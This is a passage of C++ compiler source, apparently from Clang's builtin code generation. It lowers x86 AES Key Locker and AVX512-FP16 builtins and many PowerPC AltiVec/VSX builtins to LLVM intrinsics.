BlockName = "aesdec128kl";
break;
case X86::BI__builtin_ia32_aesenc256kl_u8:
IID = Intrinsic::x86_aesenc256kl;
BlockName = "aesenc256kl";
break;
case X86::BI__builtin_ia32_aesdec256kl_u8:
IID = Intrinsic::x86_aesdec256kl;
BlockName = "aesdec256kl";
break;
}
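// The intrinsic returns {success flag, result}. Branch on the flag so the
// destination receives the processed block on success and zero on failure,
// then return the flag itself.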
Value *Call = Builder.CreateCall(CGM.getIntrinsic(IID), {Ops[1], Ops[2]});
BasicBlock *NoError =
createBasicBlock(BlockName + "_no_error", this->CurFn);
BasicBlock *Error = createBasicBlock(BlockName + "_error", this->CurFn);
BasicBlock *End = createBasicBlock(BlockName + "_end", this->CurFn);
Value *Ret = Builder.CreateExtractValue(Call, 0);
Value *Succ = Builder.CreateTrunc(Ret, Builder.getInt1Ty());
Value *Out = Builder.CreateExtractValue(Call, 1);
Builder.CreateCondBr(Succ, NoError, Error);
Builder.SetInsertPoint(NoError);
Builder.CreateDefaultAlignedStore(Out, Ops[0]);
Builder.CreateBr(End);
Builder.SetInsertPoint(Error);
Constant *Zero = llvm::Constant::getNullValue(Out->getType());
Builder.CreateDefaultAlignedStore(Zero, Ops[0]);
Builder.CreateBr(End);
Builder.SetInsertPoint(End);
return Builder.CreateExtractValue(Call, 0);
}
case X86::BI__builtin_ia32_aesencwide128kl_u8:
case X86::BI__builtin_ia32_aesdecwide128kl_u8:
case X86::BI__builtin_ia32_aesencwide256kl_u8:
case X86::BI__builtin_ia32_aesdecwide256kl_u8: {
Intrinsic::ID IID;
StringRef BlockName;
switch (BuiltinID) {
case X86::BI__builtin_ia32_aesencwide128kl_u8:
IID = Intrinsic::x86_aesencwide128kl;
BlockName = "aesencwide128kl";
break;
case X86::BI__builtin_ia32_aesdecwide128kl_u8:
IID = Intrinsic::x86_aesdecwide128kl;
BlockName = "aesdecwide128kl";
break;
case X86::BI__builtin_ia32_aesencwide256kl_u8:
IID = Intrinsic::x86_aesencwide256kl;
BlockName = "aesencwide256kl";
break;
case X86::BI__builtin_ia32_aesdecwide256kl_u8:
IID = Intrinsic::x86_aesdecwide256kl;
BlockName = "aesdecwide256kl";
break;
}
llvm::Type *Ty = FixedVectorType::get(Builder.getInt64Ty(), 2);
Value *InOps[9];
InOps[0] = Ops[2];
for (int i = 0; i != 8; ++i) {
Value *Ptr = Builder.CreateConstGEP1_32(Ty, Ops[1], i);
InOps[i + 1] = Builder.CreateAlignedLoad(Ty, Ptr, Align(16));
}
Value *Call = Builder.CreateCall(CGM.getIntrinsic(IID), InOps);
BasicBlock *NoError =
createBasicBlock(BlockName + "_no_error", this->CurFn);
BasicBlock *Error = createBasicBlock(BlockName + "_error", this->CurFn);
BasicBlock *End = createBasicBlock(BlockName + "_end", this->CurFn);
Value *Ret = Builder.CreateExtractValue(Call, 0);
Value *Succ = Builder.CreateTrunc(Ret, Builder.getInt1Ty());
Builder.CreateCondBr(Succ, NoError, Error);
Builder.SetInsertPoint(NoError);
for (int i = 0; i != 8; ++i) {
Value *Extract = Builder.CreateExtractValue(Call, i + 1);
Value *Ptr = Builder.CreateConstGEP1_32(Extract->getType(), Ops[0], i);
Builder.CreateAlignedStore(Extract, Ptr, Align(16));
}
Builder.CreateBr(End);
Builder.SetInsertPoint(Error);
for (int i = 0; i != 8; ++i) {
Value *Out = Builder.CreateExtractValue(Call, i + 1);
Constant *Zero = llvm::Constant::getNullValue(Out->getType());
Value *Ptr = Builder.CreateConstGEP1_32(Out->getType(), Ops[0], i);
Builder.CreateAlignedStore(Zero, Ptr, Align(16));
}
Builder.CreateBr(End);
Builder.SetInsertPoint(End);
return Builder.CreateExtractValue(Call, 0);
}
case X86::BI__builtin_ia32_vfcmaddcph512_mask:
IsConjFMA = true;
LLVM_FALLTHROUGH;
case X86::BI__builtin_ia32_vfmaddcph512_mask: {
Intrinsic::ID IID = IsConjFMA
? Intrinsic::x86_avx512fp16_mask_vfcmadd_cph_512
: Intrinsic::x86_avx512fp16_mask_vfmadd_cph_512;
Value *Call = Builder.CreateCall(CGM.getIntrinsic(IID), Ops);
return EmitX86Select(*this, Ops[3], Call, Ops[0]);
}
case X86::BI__builtin_ia32_vfcmaddcsh_round_mask:
IsConjFMA = true;
LLVM_FALLTHROUGH;
case X86::BI__builtin_ia32_vfmaddcsh_round_mask: {
Intrinsic::ID IID = IsConjFMA ? Intrinsic::x86_avx512fp16_mask_vfcmadd_csh
: Intrinsic::x86_avx512fp16_mask_vfmadd_csh;
Value *Call = Builder.CreateCall(CGM.getIntrinsic(IID), Ops);
Value *And = Builder.CreateAnd(Ops[3], llvm::ConstantInt::get(Int8Ty, 1));
return EmitX86Select(*this, And, Call, Ops[0]);
}
case X86::BI__builtin_ia32_vfcmaddcsh_round_mask3:
IsConjFMA = true;
LLVM_FALLTHROUGH;
case X86::BI__builtin_ia32_vfmaddcsh_round_mask3: {
Intrinsic::ID IID = IsConjFMA ? Intrinsic::x86_avx512fp16_mask_vfcmadd_csh
: Intrinsic::x86_avx512fp16_mask_vfmadd_csh;
Value *Call = Builder.CreateCall(CGM.getIntrinsic(IID), Ops);
static constexpr int Mask[] = {0, 5, 6, 7};
return Builder.CreateShuffleVector(Call, Ops[2], Mask);
}
}
}
Value *CodeGenFunction::EmitPPCBuiltinExpr(unsigned BuiltinID,
const CallExpr *E) {
SmallVector<Value*, 4> Ops;
for (unsigned i = 0, e = E->getNumArgs(); i != e; i++) {
if (E->getArg(i)->getType()->isArrayType())
Ops.push_back(EmitArrayToPointerDecay(E->getArg(i)).getPointer());
else
Ops.push_back(EmitScalarExpr(E->getArg(i)));
}
Intrinsic::ID ID = Intrinsic::not_intrinsic;
switch (BuiltinID) {
default: return nullptr;
// __builtin_ppc_get_timebase is GCC 4.8+'s PowerPC-specific name for what we
// call __builtin_readcyclecounter.
case PPC::BI__builtin_ppc_get_timebase:
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::readcyclecounter));
// vec_ld, vec_xl_be, vec_lvsl, vec_lvsr
case PPC::BI__builtin_altivec_lvx:
case PPC::BI__builtin_altivec_lvxl:
case PPC::BI__builtin_altivec_lvebx:
case PPC::BI__builtin_altivec_lvehx:
case PPC::BI__builtin_altivec_lvewx:
case PPC::BI__builtin_altivec_lvsl:
case PPC::BI__builtin_altivec_lvsr:
case PPC::BI__builtin_vsx_lxvd2x:
case PPC::BI__builtin_vsx_lxvw4x:
case PPC::BI__builtin_vsx_lxvd2x_be:
case PPC::BI__builtin_vsx_lxvw4x_be:
case PPC::BI__builtin_vsx_lxvl:
case PPC::BI__builtin_vsx_lxvll:
{
if (BuiltinID == PPC::BI__builtin_vsx_lxvl ||
BuiltinID == PPC::BI__builtin_vsx_lxvll) {
Ops[0] = Builder.CreateBitCast(Ops[0], Int8PtrTy);
} else {
Ops[1] = Builder.CreateBitCast(Ops[1], Int8PtrTy);
Ops[0] = Builder.CreateGEP(Int8Ty, Ops[1], Ops[0]);
Ops.pop_back();
}
switch (BuiltinID) {
default: llvm_unreachable("Unsupported ld/lvsl/lvsr intrinsic!");
case PPC::BI__builtin_altivec_lvx:
ID = Intrinsic::ppc_altivec_lvx;
break;
case PPC::BI__builtin_altivec_lvxl:
ID = Intrinsic::ppc_altivec_lvxl;
break;
case PPC::BI__builtin_altivec_lvebx:
ID = Intrinsic::ppc_altivec_lvebx;
break;
case PPC::BI__builtin_altivec_lvehx:
ID = Intrinsic::ppc_altivec_lvehx;
break;
case PPC::BI__builtin_altivec_lvewx:
ID = Intrinsic::ppc_altivec_lvewx;
break;
case PPC::BI__builtin_altivec_lvsl:
ID = Intrinsic::ppc_altivec_lvsl;
break;
case PPC::BI__builtin_altivec_lvsr:
ID = Intrinsic::ppc_altivec_lvsr;
break;
case PPC::BI__builtin_vsx_lxvd2x:
ID = Intrinsic::ppc_vsx_lxvd2x;
break;
case PPC::BI__builtin_vsx_lxvw4x:
ID = Intrinsic::ppc_vsx_lxvw4x;
break;
case PPC::BI__builtin_vsx_lxvd2x_be:
ID = Intrinsic::ppc_vsx_lxvd2x_be;
break;
case PPC::BI__builtin_vsx_lxvw4x_be:
ID = Intrinsic::ppc_vsx_lxvw4x_be;
break;
case PPC::BI__builtin_vsx_lxvl:
ID = Intrinsic::ppc_vsx_lxvl;
break;
case PPC::BI__builtin_vsx_lxvll:
ID = Intrinsic::ppc_vsx_lxvll;
break;
}
llvm::Function *F = CGM.getIntrinsic(ID);
return Builder.CreateCall(F, Ops, "");
}
// vec_st, vec_xst_be
case PPC::BI__builtin_altivec_stvx:
case PPC::BI__builtin_altivec_stvxl:
case PPC::BI__builtin_altivec_stvebx:
case PPC::BI__builtin_altivec_stvehx:
case PPC::BI__builtin_altivec_stvewx:
case PPC::BI__builtin_vsx_stxvd2x:
case PPC::BI__builtin_vsx_stxvw4x:
case PPC::BI__builtin_vsx_stxvd2x_be:
case PPC::BI__builtin_vsx_stxvw4x_be:
case PPC::BI__builtin_vsx_stxvl:
case PPC::BI__builtin_vsx_stxvll:
{
if (BuiltinID == PPC::BI__builtin_vsx_stxvl ||
BuiltinID == PPC::BI__builtin_vsx_stxvll) {
Ops[1] = Builder.CreateBitCast(Ops[1], Int8PtrTy);
} else {
Ops[2] = Builder.CreateBitCast(Ops[2], Int8PtrTy);
Ops[1] = Builder.CreateGEP(Int8Ty, Ops[2], Ops[1]);
Ops.pop_back();
}
switch (BuiltinID) {
default: llvm_unreachable("Unsupported st intrinsic!");
case PPC::BI__builtin_altivec_stvx:
ID = Intrinsic::ppc_altivec_stvx;
break;
case PPC::BI__builtin_altivec_stvxl:
ID = Intrinsic::ppc_altivec_stvxl;
break;
case PPC::BI__builtin_altivec_stvebx:
ID = Intrinsic::ppc_altivec_stvebx;
break;
case PPC::BI__builtin_altivec_stvehx:
ID = Intrinsic::ppc_altivec_stvehx;
break;
case PPC::BI__builtin_altivec_stvewx:
ID = Intrinsic::ppc_altivec_stvewx;
break;
case PPC::BI__builtin_vsx_stxvd2x:
ID = Intrinsic::ppc_vsx_stxvd2x;
break;
case PPC::BI__builtin_vsx_stxvw4x:
ID = Intrinsic::ppc_vsx_stxvw4x;
break;
case PPC::BI__builtin_vsx_stxvd2x_be:
ID = Intrinsic::ppc_vsx_stxvd2x_be;
break;
case PPC::BI__builtin_vsx_stxvw4x_be:
ID = Intrinsic::ppc_vsx_stxvw4x_be;
break;
case PPC::BI__builtin_vsx_stxvl:
ID = Intrinsic::ppc_vsx_stxvl;
break;
case PPC::BI__builtin_vsx_stxvll:
ID = Intrinsic::ppc_vsx_stxvll;
break;
}
llvm::Function *F = CGM.getIntrinsic(ID);
return Builder.CreateCall(F, Ops, "");
}
case PPC::BI__builtin_vsx_ldrmb: {
// Essentially boils down to performing an unaligned VMX load sequence so
// as to avoid crossing a page boundary, and then shuffling the elements
// into the right side of the vector register.
int64_t NumBytes = cast<ConstantInt>(Ops[1])->getZExtValue();
llvm::Type *ResTy = ConvertType(E->getType());
bool IsLE = getTarget().isLittleEndian();
// If the user wants the entire vector, just load the entire vector.
if (NumBytes == 16) {
Value *BC = Builder.CreateBitCast(Ops[0], ResTy->getPointerTo());
Value *LD = Builder.CreateLoad(Address(BC, CharUnits::fromQuantity(1)));
if (!IsLE)
return LD;
// Reverse the bytes on LE.
SmallVector<int, 16> RevMask;
for (int Idx = 0; Idx < 16; Idx++)
RevMask.push_back(15 - Idx);
return Builder.CreateShuffleVector(LD, LD, RevMask);
}
llvm::Function *Lvx = CGM.getIntrinsic(Intrinsic::ppc_altivec_lvx);
llvm::Function *Lvs = CGM.getIntrinsic(IsLE ? Intrinsic::ppc_altivec_lvsr
: Intrinsic::ppc_altivec_lvsl);
llvm::Function *Vperm = CGM.getIntrinsic(Intrinsic::ppc_altivec_vperm);
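// lvx ignores the low four bits of the address, so the loads at Ops[0] and
// at Ops[0] + NumBytes - 1 each stay within an aligned quadword and never
// cross a page boundary; the lvsl/lvsr mask then drives vperm to splice
// the requested bytes out of the two loads.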
Value *HiMem = Builder.CreateGEP(
Int8Ty, Ops[0], ConstantInt::get(Ops[1]->getType(), NumBytes - 1));
Value *LoLd = Builder.CreateCall(Lvx, Ops[0], "ld.lo");
Value *HiLd = Builder.CreateCall(Lvx, HiMem, "ld.hi");
Value *Mask1 = Builder.CreateCall(Lvs, Ops[0], "mask1");
Ops.clear();
Ops.push_back(IsLE ? HiLd : LoLd);
Ops.push_back(IsLE ? LoLd : HiLd);
Ops.push_back(Mask1);
Value *AllElts = Builder.CreateCall(Vperm, Ops, "shuffle1");
Constant *Zero =
llvm::Constant::getNullValue(IsLE ? ResTy : AllElts->getType());
if (IsLE) {
SmallVector<int, 16> Consts;
for (int Idx = 0; Idx < 16; Idx++) {
int Val = (NumBytes - Idx - 1 >= 0) ? (NumBytes - Idx - 1)
: 16 - (NumBytes - Idx);
Consts.push_back(Val);
}
return Builder.CreateShuffleVector(Builder.CreateBitCast(AllElts, ResTy),
Zero, Consts);
}
SmallVector<Constant *, 16> Consts;
for (int Idx = 0; Idx < 16; Idx++)
Consts.push_back(Builder.getInt8(NumBytes + Idx));
Value *Mask2 = ConstantVector::get(Consts);
return Builder.CreateBitCast(
Builder.CreateCall(Vperm, {Zero, AllElts, Mask2}, "shuffle2"), ResTy);
}
case PPC::BI__builtin_vsx_strmb: {
int64_t NumBytes = cast<ConstantInt>(Ops[1])->getZExtValue();
bool IsLE = getTarget().isLittleEndian();
auto StoreSubVec = [&](unsigned Width, unsigned Offset, unsigned EltNo) {
// When storing the whole vector, store it directly on BE; on LE, reverse
// the bytes first and then store.
if (Width == 16) {
Value *BC =
Builder.CreateBitCast(Ops[0], Ops[2]->getType()->getPointerTo());
Value *StVec = Ops[2];
if (IsLE) {
SmallVector<int, 16> RevMask;
for (int Idx = 0; Idx < 16; Idx++)
RevMask.push_back(15 - Idx);
StVec = Builder.CreateShuffleVector(Ops[2], Ops[2], RevMask);
}
return Builder.CreateStore(StVec,
Address(BC, CharUnits::fromQuantity(1)));
}
auto *ConvTy = Int64Ty;
unsigned NumElts = 0;
switch (Width) {
default:
llvm_unreachable("width for stores must be a power of 2");
case 8:
ConvTy = Int64Ty;
NumElts = 2;
break;
case 4:
ConvTy = Int32Ty;
NumElts = 4;
break;
case 2:
ConvTy = Int16Ty;
NumElts = 8;
break;
case 1:
ConvTy = Int8Ty;
NumElts = 16;
break;
}
Value *Vec = Builder.CreateBitCast(
Ops[2], llvm::FixedVectorType::get(ConvTy, NumElts));
Value *Ptr = Builder.CreateGEP(Int8Ty, Ops[0],
ConstantInt::get(Int64Ty, Offset));
Value *PtrBC = Builder.CreateBitCast(Ptr, ConvTy->getPointerTo());
Value *Elt = Builder.CreateExtractElement(Vec, EltNo);
if (IsLE && Width > 1) {
Function *F = CGM.getIntrinsic(Intrinsic::bswap, ConvTy);
Elt = Builder.CreateCall(F, Elt);
}
return Builder.CreateStore(Elt,
Address(PtrBC, CharUnits::fromQuantity(1)));
};
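// Decompose the store into power-of-two sized chunks, largest first. E.g.
// NumBytes == 7 becomes a 4-byte store at offset 3, a 2-byte store at
// offset 1 and a 1-byte store at offset 0.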
unsigned Stored = 0;
unsigned RemainingBytes = NumBytes;
Value *Result;
if (NumBytes == 16)
return StoreSubVec(16, 0, 0);
if (NumBytes >= 8) {
Result = StoreSubVec(8, NumBytes - 8, IsLE ? 0 : 1);
RemainingBytes -= 8;
Stored += 8;
}
if (RemainingBytes >= 4) {
Result = StoreSubVec(4, NumBytes - Stored - 4,
IsLE ? (Stored >> 2) : 3 - (Stored >> 2));
RemainingBytes -= 4;
Stored += 4;
}
if (RemainingBytes >= 2) {
Result = StoreSubVec(2, NumBytes - Stored - 2,
IsLE ? (Stored >> 1) : 7 - (Stored >> 1));
RemainingBytes -= 2;
Stored += 2;
}
if (RemainingBytes)
Result =
StoreSubVec(1, NumBytes - Stored - 1, IsLE ? Stored : 15 - Stored);
return Result;
}
// Square root
case PPC::BI__builtin_vsx_xvsqrtsp:
case PPC::BI__builtin_vsx_xvsqrtdp: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
if (Builder.getIsFPConstrained()) {
llvm::Function *F = CGM.getIntrinsic(
Intrinsic::experimental_constrained_sqrt, ResultType);
return Builder.CreateConstrainedFPCall(F, X);
} else {
llvm::Function *F = CGM.getIntrinsic(Intrinsic::sqrt, ResultType);
return Builder.CreateCall(F, X);
}
}
// Count leading zeros
case PPC::BI__builtin_altivec_vclzb:
case PPC::BI__builtin_altivec_vclzh:
case PPC::BI__builtin_altivec_vclzw:
case PPC::BI__builtin_altivec_vclzd: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Value *Undef = ConstantInt::get(Builder.getInt1Ty(), false);
Function *F = CGM.getIntrinsic(Intrinsic::ctlz, ResultType);
return Builder.CreateCall(F, {X, Undef});
}
case PPC::BI__builtin_altivec_vctzb:
case PPC::BI__builtin_altivec_vctzh:
case PPC::BI__builtin_altivec_vctzw:
case PPC::BI__builtin_altivec_vctzd: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Value *Undef = ConstantInt::get(Builder.getInt1Ty(), false);
Function *F = CGM.getIntrinsic(Intrinsic::cttz, ResultType);
return Builder.CreateCall(F, {X, Undef});
}
case PPC::BI__builtin_altivec_vec_replace_elt:
case PPC::BI__builtin_altivec_vec_replace_unaligned: {
// The third argument of vec_replace_elt and vec_replace_unaligned must
// be a compile time constant and is emitted as either the vinsw or the
// vinsd instruction.
ConstantInt *ArgCI = dyn_cast<ConstantInt>(Ops[2]);
assert(ArgCI &&
"Third Arg to vinsw/vinsd intrinsic must be a constant integer!");
llvm::Type *ResultType = ConvertType(E->getType());
llvm::Function *F = nullptr;
Value *Call = nullptr;
int64_t ConstArg = ArgCI->getSExtValue();
unsigned ArgWidth = Ops[1]->getType()->getPrimitiveSizeInBits();
bool Is32Bit = false;
assert((ArgWidth == 32 || ArgWidth == 64) && "Invalid argument width");
// The input to vec_replace_elt is an element index, not a byte index.
if (BuiltinID == PPC::BI__builtin_altivec_vec_replace_elt)
ConstArg *= ArgWidth / 8;
if (ArgWidth == 32) {
Is32Bit = true;
// When the second argument is 32 bits, it can either be an integer or
// a float. The vinsw intrinsic is used in this case.
F = CGM.getIntrinsic(Intrinsic::ppc_altivec_vinsw);
// Fix the constant according to endianness.
if (getTarget().isLittleEndian())
ConstArg = 12 - ConstArg;
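// (vinsw counts bytes from the left of the register, where LE element 0
// lives at byte offset 12, hence the mirroring.)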
} else {
// When the second argument is 64 bits, it can either be a long long or
// a double. The vinsd intrinsic is used in this case.
F = CGM.getIntrinsic(Intrinsic::ppc_altivec_vinsd);
// Fix the constant for little endian.
if (getTarget().isLittleEndian())
ConstArg = 8 - ConstArg;
}
Ops[2] = ConstantInt::getSigned(Int32Ty, ConstArg);
// Depending on ArgWidth, the input vector may hold floats or doubles
// rather than integers. If it holds floats, bitcast the inputs to 32-bit
// integers; if it holds doubles, bitcast them to 64-bit integers.
if (!Ops[1]->getType()->isIntegerTy(ArgWidth)) {
Ops[0] = Builder.CreateBitCast(
Ops[0], Is32Bit ? llvm::FixedVectorType::get(Int32Ty, 4)
: llvm::FixedVectorType::get(Int64Ty, 2));
Ops[1] = Builder.CreateBitCast(Ops[1], Is32Bit ? Int32Ty : Int64Ty);
}
// Emit the call to vinsw or vinsd.
Call = Builder.CreateCall(F, Ops);
// Depending on the builtin, bitcast to the appropriate result type.
if (BuiltinID == PPC::BI__builtin_altivec_vec_replace_elt &&
!Ops[1]->getType()->isIntegerTy())
return Builder.CreateBitCast(Call, ResultType);
else if (BuiltinID == PPC::BI__builtin_altivec_vec_replace_elt &&
Ops[1]->getType()->isIntegerTy())
return Call;
else
return Builder.CreateBitCast(Call,
llvm::FixedVectorType::get(Int8Ty, 16));
}
case PPC::BI__builtin_altivec_vpopcntb:
case PPC::BI__builtin_altivec_vpopcnth:
case PPC::BI__builtin_altivec_vpopcntw:
case PPC::BI__builtin_altivec_vpopcntd: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
llvm::Function *F = CGM.getIntrinsic(Intrinsic::ctpop, ResultType);
return Builder.CreateCall(F, X);
}
case PPC::BI__builtin_altivec_vadduqm:
case PPC::BI__builtin_altivec_vsubuqm: {
llvm::Type *Int128Ty = llvm::IntegerType::get(getLLVMContext(), 128);
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int128Ty, 1));
Ops[1] =
Builder.CreateBitCast(Ops[1], llvm::FixedVectorType::get(Int128Ty, 1));
if (BuiltinID == PPC::BI__builtin_altivec_vadduqm)
return Builder.CreateAdd(Ops[0], Ops[1], "vadduqm");
else
return Builder.CreateSub(Ops[0], Ops[1], "vsubuqm");
}
// Rotate and insert under mask operation.
// __rldimi(rs, is, shift, mask)
// (rotl64(rs, shift) & mask) | (is & ~mask)
// __rlwimi(rs, is, shift, mask)
// (rotl(rs, shift) & mask) | (is & ~mask)
case PPC::BI__builtin_ppc_rldimi:
case PPC::BI__builtin_ppc_rlwimi: {
llvm::Type *Ty = Ops[0]->getType();
Function *F = CGM.getIntrinsic(Intrinsic::fshl, Ty);
if (BuiltinID == PPC::BI__builtin_ppc_rldimi)
Ops[2] = Builder.CreateZExt(Ops[2], Int64Ty);
Value *Shift = Builder.CreateCall(F, {Ops[0], Ops[0], Ops[2]});
Value *X = Builder.CreateAnd(Shift, Ops[3]);
Value *Y = Builder.CreateAnd(Ops[1], Builder.CreateNot(Ops[3]));
return Builder.CreateOr(X, Y);
}
// Rotate and insert under mask operation.
// __rlwnm(rs, shift, mask)
// rotl(rs, shift) & mask
case PPC::BI__builtin_ppc_rlwnm: {
llvm::Type *Ty = Ops[0]->getType();
Function *F = CGM.getIntrinsic(Intrinsic::fshl, Ty);
Value *Shift = Builder.CreateCall(F, {Ops[0], Ops[0], Ops[1]});
return Builder.CreateAnd(Shift, Ops[2]);
}
case PPC::BI__builtin_ppc_poppar4:
case PPC::BI__builtin_ppc_poppar8: {
llvm::Type *ArgType = Ops[0]->getType();
Function *F = CGM.getIntrinsic(Intrinsic::ctpop, ArgType);
Value *Tmp = Builder.CreateCall(F, Ops[0]);
llvm::Type *ResultType = ConvertType(E->getType());
Value *Result = Builder.CreateAnd(Tmp, llvm::ConstantInt::get(ArgType, 1));
if (Result->getType() != ResultType)
Result = Builder.CreateIntCast(Result, ResultType, /*isSigned*/true,
"cast");
return Result;
}
case PPC::BI__builtin_ppc_cmpb: {
if (getTarget().getTriple().isPPC64()) {
Function *F =
CGM.getIntrinsic(Intrinsic::ppc_cmpb, {Int64Ty, Int64Ty, Int64Ty});
return Builder.CreateCall(F, Ops, "cmpb");
}
// For 32 bit, emit the code as below:
// %conv = trunc i64 %a to i32
// %conv1 = trunc i64 %b to i32
// %shr = lshr i64 %a, 32
// %conv2 = trunc i64 %shr to i32
// %shr3 = lshr i64 %b, 32
// %conv4 = trunc i64 %shr3 to i32
// %0 = tail call i32 @llvm.ppc.cmpb32(i32 %conv, i32 %conv1)
// %conv5 = zext i32 %0 to i64
// %1 = tail call i32 @llvm.ppc.cmpb32(i32 %conv2, i32 %conv4)
// %conv614 = zext i32 %1 to i64
// %shl = shl nuw i64 %conv614, 32
// %or = or i64 %shl, %conv5
// ret i64 %or
Function *F =
CGM.getIntrinsic(Intrinsic::ppc_cmpb, {Int32Ty, Int32Ty, Int32Ty});
Value *ArgOneLo = Builder.CreateTrunc(Ops[0], Int32Ty);
Value *ArgTwoLo = Builder.CreateTrunc(Ops[1], Int32Ty);
Constant *ShiftAmt = ConstantInt::get(Int64Ty, 32);
Value *ArgOneHi =
Builder.CreateTrunc(Builder.CreateLShr(Ops[0], ShiftAmt), Int32Ty);
Value *ArgTwoHi =
Builder.CreateTrunc(Builder.CreateLShr(Ops[1], ShiftAmt), Int32Ty);
Value *ResLo = Builder.CreateZExt(
Builder.CreateCall(F, {ArgOneLo, ArgTwoLo}, "cmpb"), Int64Ty);
Value *ResHiShift = Builder.CreateZExt(
Builder.CreateCall(F, {ArgOneHi, ArgTwoHi}, "cmpb"), Int64Ty);
Value *ResHi = Builder.CreateShl(ResHiShift, ShiftAmt);
return Builder.CreateOr(ResLo, ResHi);
}
// Copy sign
case PPC::BI__builtin_vsx_xvcpsgnsp:
case PPC::BI__builtin_vsx_xvcpsgndp: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Value *Y = EmitScalarExpr(E->getArg(1));
ID = Intrinsic::copysign;
llvm::Function *F = CGM.getIntrinsic(ID, ResultType);
return Builder.CreateCall(F, {X, Y});
}
// Rounding/truncation
case PPC::BI__builtin_vsx_xvrspip:
case PPC::BI__builtin_vsx_xvrdpip:
case PPC::BI__builtin_vsx_xvrdpim:
case PPC::BI__builtin_vsx_xvrspim:
case PPC::BI__builtin_vsx_xvrdpi:
case PPC::BI__builtin_vsx_xvrspi:
case PPC::BI__builtin_vsx_xvrdpic:
case PPC::BI__builtin_vsx_xvrspic:
case PPC::BI__builtin_vsx_xvrdpiz:
case PPC::BI__builtin_vsx_xvrspiz: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
if (BuiltinID == PPC::BI__builtin_vsx_xvrdpim ||
BuiltinID == PPC::BI__builtin_vsx_xvrspim)
ID = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_floor
: Intrinsic::floor;
else if (BuiltinID == PPC::BI__builtin_vsx_xvrdpi ||
BuiltinID == PPC::BI__builtin_vsx_xvrspi)
ID = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_round
: Intrinsic::round;
else if (BuiltinID == PPC::BI__builtin_vsx_xvrdpic ||
BuiltinID == PPC::BI__builtin_vsx_xvrspic)
ID = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_rint
: Intrinsic::rint;
else if (BuiltinID == PPC::BI__builtin_vsx_xvrdpip ||
BuiltinID == PPC::BI__builtin_vsx_xvrspip)
ID = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_ceil
: Intrinsic::ceil;
else if (BuiltinID == PPC::BI__builtin_vsx_xvrdpiz ||
BuiltinID == PPC::BI__builtin_vsx_xvrspiz)
ID = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_trunc
: Intrinsic::trunc;
llvm::Function *F = CGM.getIntrinsic(ID, ResultType);
return Builder.getIsFPConstrained() ? Builder.CreateConstrainedFPCall(F, X)
: Builder.CreateCall(F, X);
}
// Absolute value
case PPC::BI__builtin_vsx_xvabsdp:
case PPC::BI__builtin_vsx_xvabssp: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
llvm::Function *F = CGM.getIntrinsic(Intrinsic::fabs, ResultType);
return Builder.CreateCall(F, X);
}
// Fastmath by default
case PPC::BI__builtin_ppc_recipdivf:
case PPC::BI__builtin_ppc_recipdivd:
case PPC::BI__builtin_ppc_rsqrtf:
case PPC::BI__builtin_ppc_rsqrtd: {
FastMathFlags FMF = Builder.getFastMathFlags();
Builder.getFastMathFlags().setFast();
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
if (BuiltinID == PPC::BI__builtin_ppc_recipdivf ||
BuiltinID == PPC::BI__builtin_ppc_recipdivd) {
Value *Y = EmitScalarExpr(E->getArg(1));
Value *FDiv = Builder.CreateFDiv(X, Y, "recipdiv");
Builder.getFastMathFlags() &= FMF;
return FDiv;
}
auto *One = ConstantFP::get(ResultType, 1.0);
llvm::Function *F = CGM.getIntrinsic(Intrinsic::sqrt, ResultType);
Value *FDiv = Builder.CreateFDiv(One, Builder.CreateCall(F, X), "rsqrt");
Builder.getFastMathFlags() &= FMF;
return FDiv;
}
case PPC::BI__builtin_ppc_alignx: {
ConstantInt *AlignmentCI = cast<ConstantInt>(Ops[0]);
if (AlignmentCI->getValue().ugt(llvm::Value::MaximumAlignment))
AlignmentCI = ConstantInt::get(AlignmentCI->getType(),
llvm::Value::MaximumAlignment);
emitAlignmentAssumption(Ops[1], E->getArg(1),
/*The expr loc is sufficient.*/ SourceLocation(),
AlignmentCI, nullptr);
return Ops[1];
}
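// __rdlam(rs, shift, mask): rotl64(rs, shift) & mask, with the rotate
// emitted as a funnel shift.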
case PPC::BI__builtin_ppc_rdlam: {
llvm::Type *Ty = Ops[0]->getType();
Value *ShiftAmt = Builder.CreateIntCast(Ops[1], Ty, false);
Function *F = CGM.getIntrinsic(Intrinsic::fshl, Ty);
Value *Rotate = Builder.CreateCall(F, {Ops[0], Ops[0], ShiftAmt});
return Builder.CreateAnd(Rotate, Ops[2]);
}
case PPC::BI__builtin_ppc_load2r: {
Function *F = CGM.getIntrinsic(Intrinsic::ppc_load2r);
Ops[0] = Builder.CreateBitCast(Ops[0], Int8PtrTy);
Value *LoadIntrinsic = Builder.CreateCall(F, Ops);
return Builder.CreateTrunc(LoadIntrinsic, Int16Ty);
}
// FMA variations
case PPC::BI__builtin_vsx_xvmaddadp:
case PPC::BI__builtin_vsx_xvmaddasp:
case PPC::BI__builtin_vsx_xvnmaddadp:
case PPC::BI__builtin_vsx_xvnmaddasp:
case PPC::BI__builtin_vsx_xvmsubadp:
case PPC::BI__builtin_vsx_xvmsubasp:
case PPC::BI__builtin_vsx_xvnmsubadp:
case PPC::BI__builtin_vsx_xvnmsubasp: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Value *Y = EmitScalarExpr(E->getArg(1));
Value *Z = EmitScalarExpr(E->getArg(2));
llvm::Function *F;
if (Builder.getIsFPConstrained())
